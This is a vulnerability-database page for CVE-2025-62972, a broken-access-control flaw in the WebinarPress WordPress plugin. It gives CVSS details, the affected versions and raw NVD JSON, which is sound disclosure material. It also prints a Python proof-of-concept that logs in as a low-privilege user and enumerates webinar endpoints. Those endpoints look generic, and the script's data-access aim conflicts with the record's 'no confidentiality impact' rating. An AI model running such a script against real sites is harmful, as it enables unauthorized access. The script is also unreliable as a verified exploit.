Security Vulnerability Report
中文
CVE-2025-62972 CVSS 4.3 MEDIUM

CVE-2025-62972

Published: 2025-10-27 02:15:58
Last Modified: 2026-04-27 17:16:39

Description

Missing Authorization vulnerability in WPWebinarSystem WebinarPress wp-webinarsystem allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebinarPress: from n/a through <= 1.33.28.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:webinarpress:webinarpress:*:*:*:*:lite:wordpress:*:* - VULNERABLE
wp-webinarsystem (WebinarPress) <= 1.33.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62972 PoC - Broken Access Control in WebinarPress # Target: WordPress site with vulnerable wp-webinarsystem plugin TARGET_URL = "http://target-wordpress-site.com" # Authenticated user with low privileges (subscriber/contributor) USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_auth_token(): """Get WordPress authentication cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_broken_access_control(cookies, webinar_id): """Exploit missing authorization to access restricted webinar data""" # Try to access webinar data without proper authorization endpoints = [ f"{TARGET_URL}/wp-json/wp-webinarsystem/v1/webinar/{webinar_id}", f"{TARGET_URL}/wp-json/wp-webinarsystem/v1/registrations", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=get_webinar_data&id={webinar_id}" ] for endpoint in endpoints: try: response = requests.get(endpoint, cookies=cookies) if response.status_code == 200: print(f"[!] Vulnerable endpoint found: {endpoint}") print(f"Response: {response.text[:500]}") except Exception as e: print(f"Error: {e}") def main(): cookies = get_auth_token() # Target webinar IDs to enumerate for webinar_id in range(1, 100): exploit_broken_access_control(cookies, webinar_id) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62972", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:57.743", "lastModified": "2026-04-27T17:16:38.830", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WPWebinarSystem WebinarPress wp-webinarsystem allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WebinarPress: from n/a through <= 1.33.28."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webinarpress:webinarpress:*:*:*:*:lite:wordpress:*:*", "versionEndIncluding": "1.33.28", "matchCriteriaId": "9CB00DC2-DF78-433A-B031-C69420FDA513"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-webinarsystem/vulnerability/wordpress-webinarpress-plugin-1-33-28-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}